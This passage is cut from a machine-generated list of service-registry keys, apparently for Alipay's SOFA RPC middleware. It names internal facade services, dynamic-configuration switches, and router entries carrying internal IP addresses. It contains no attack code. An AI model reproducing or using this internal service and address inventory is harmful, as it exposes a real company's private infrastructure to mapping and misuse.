.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfinvest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.transferprod.common.service.facade.api.TransferPromoEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.49.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityexprod.biz.lisa.service.notificationauth.LisaNotificationAuthInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.online.TaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kgopen.container.facade.api.KgOnlineServiceInvokeFacade:1.0:kgopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.compmng.service.facade.HealthGraphFacade:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbenefit.facade.service.DelayRepayDayBenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdepbuss.common.facade.api.demandaccount.interest.InterestSettlementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfmac.common.service.budget.facade.MakingUnitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.150.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.test.pub:1.0@DEFAULT@testcloud#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.biz.service.facade.BizChainQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmobile.common.service.facade.consultant.ConsultantServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.MemberInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.complainmessage.impl.FraudFeedBackWordingSwitchImpl.caseLabelOptionNotFeed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bumng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_B_FOPSHOP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.settlequery.common.service.facade.payment.api.PayOrderHisQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.lisa.LisaProductManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifin.bankcard.service.facade.VerifiedServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.BridgeAuthFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.charge_goldenMysqlWriteDataSource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.processmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.97.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.service.facade.service.InspectFailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.datacube.common.service.facade.UccSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.astaralarm.common.service.facade.tvm.RiskAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoCallService:1.0:finslip@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.ardd.common.support.api.ArddRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:publicDomain_ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.YouthMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_XPLATFORM_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csplatform.service.facade.api.ServiceFollowupService:1.0:outer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpartner.common.service.facade.RebateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:meshysale_assetFlowAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.AssetProfileDrm.switchFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.commodity.TradeFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.service.ServicePartnerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.ClearingLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.libracore.common.service.facade.api.FinRecommendDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.sampleBizAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.rec.StrategyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.checkroutesdk:name=com.alipay.checkroute.common.service.datacollect.HADataClientConfigDrm.enableDataCollect,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.hkSwitchPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchmobile.common.service.facade.dingtalk.CorpServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmscore.common.service.facade.softpos.api.PosBizVerifyEx:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.air.sdk.impl.dynamic.DynamicModuleClient:1.0:recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_DEFAULT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_limitSceneEditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.log.conf.BizMonLogConfCtrlDrm.bizMonConfReload,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.checkroute.common.service.checkersdk.service.ChangeRiskDefenseService:1.0:finreconchecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_NOTIFY_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.reservemng.service.facade.mng.AccDetailMngService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.merchant.common.service.facade.SwitchCoreConsistQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchcommons.event.facade.EventxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.insCommercialSpNoStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.user.api.SecuUserRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fbepservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.exeNumPerTable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.invalidPlanId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.kgcore.common.service.client.tr.GraphTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insmobile:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.SecurityRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:microloan_agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.facade.ScorpioNpService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.DrillFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ifinflux.common.service.facade.ChannelConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.232.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.antschedulerconsole.facade.JobOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctudb.CtuRiskEventInfoRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.coveragecenter.common.service.gray.api.GrayCoverageQueryFacade:1.0:coveragecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","contentlib@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.paramcore.common.service.standard.facade.api.ParmClientLoadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.experience.VcpExperienceManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelPayStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.carMortgageAllowFirstTermPrepay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.irecon.common.service.query.fund.api.QueryBankDailyBalanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.shop.ShopPublicBindingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.UctransPrepubWhiteListDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfinancial.antchain.cloud.endpoint.facade.MarketUnionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.core.repository.account.PublicModelRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:zprodmng_callback_test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.CatalogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mrchstoreapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsccalipay.jiebei.facade.service.JieBeiCreditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.dynamicUpdateThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zcache.tbase.fingiftprodTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ebppcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.intelligentProtectionDays,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insassetprod.common.service.facade.PetProfileProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundDividendMethodFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:yuyanchangecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.ops.AppServerOpsFacade:1.0:deploymentOpsFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobileprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:securitysimulate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.pcx.service.CategoryGrailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodtrans.senior.manage.facade.ProdCacheConfigManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bic.common.service.facade.wearable.api.MobileBiometricManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesync.common.service.spi.api.MobileSyncUpstreamSpiService:1.0:mfinwormhole@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbccore.facade.changeriskdefense.BbcChangeDefenseServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapConfigReloadDrm.tntInstId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.censor:name=com.alipay.zcache.tbase.yingxutestTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.prehandle.PreContentUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.ModelLoaderServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.CertificateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.OrganizationService:1.0:organizationService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@cnamlreport#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.spr-fund-redeem-execute-init.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zhub.tangula.facade.CustomizeSolutionService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ialicore.common.igdmcclient.spi.GlobalDataSyncCallbackSpi:1.0:ifxquote@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:uniqueForecastRuleExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.comon.service.facade.trade.TradeAreaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsmng.common.service.facade.dataprovider.DataProviderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.common.LoginCompatibleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.175.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instinfo.service.facade.spi.InstInfoInvokeService:1.0:insclaiminvestprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msfluxconf:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.tables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.60.44.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rccenter.common.service.facade.RccenterReportValidateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.masterdata.common.service.facade.MasterDataCZoneOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.LogicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofaboot-msg-demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.CrowdValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_F_ACCOUNTTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.cloudnet.facade.network.NetworkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.ordermng:name=com.alipay.fc.arcore.abtest.openProxyMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.128.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasset.common.service.facade.stuff.api.StuffTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mremindprod.common.service.facade.abtest.ABTestManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yqdataservice.common.service.facade.po.PoBizTagTreeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextTBaseCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.biz.invoice.service.InvoiceCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.facade.manage.api.ParmMonitorOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.253.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.45.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:creditexprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.upgrade.sdk.common.facade.api.ModeUpgradeStepApi:1.0:dppipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.adjust.api.MultiPointsAdjustBPMService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aap.common.service.facade.forecast.ForecastEventInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.model.ApplyUnifiedModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zerox.common.service.facade.ApplicationHealthAdviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:inssdu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.52.80.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instasset.common.service.facade.RouteRuleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:gffintrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_F_EXTDATASYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.gotone.common.service.api.SendMsgboxService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.aladdin.common.service.facade.HelpRankQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.46.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dceptrans.api.DceptransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linglongsdk.server.facade.ModuleInstaller:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.TransferInService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.renderweb:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@tulingservice#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","NS_Sub_Servers_ALI_TP_F_PCREDIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.picasso.common.service.facade.creative.CreativeMaterial:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:secudownload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsmng.common.service.facade.modelinfo.ModelInfoFacade:1.0:bkModelInfoFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.insmarketingapp.InsMktProdCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.clientswitch.ClientSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:barcodeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.JobActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.rendedatahandler.data,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveRService:1.0:insttrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.core.service.repository.KbsalesBizOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmng.service.facade.FinmngControlService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.132.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfocore.common.service.facade.cds.mng.ProductPoolProcessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fppolicygw.facade.dataos.DataOsApiProxy:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.ivr.IvrNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.ProductConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.shop.DisplayGoodsTemplateAuditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.processmng_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:xztest_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.frboss.facade.api.SuitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:alb_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.HkCollectingCodeSettlementDetailsFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.HavanaMemberService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.spi.IntimateBenefitCallbackService:1.0:intimatepay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mrchiscore:name=com.alipay.mrchiscore.generic.switch.quickApiSignSupportPriceProduct,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.moduleOrderRuleJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:finsocprodMetricApproval@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.mobilegeocoding.common.service.client.drm.BizClientDrmServiceImpl.bizLogLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.util.FundTairManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payacceptance.common.service.senior.api.PayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vega.keeper.service.KeeperCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.common.service.facade.control.auth.api.FundAuthConfirmConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.32.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_F_CONTROL_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:kgmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetlibview.facade.api.AssetLibViewItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantCardQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.ipp.service.facade.insproduct.InsProductSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.FundOperatingStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0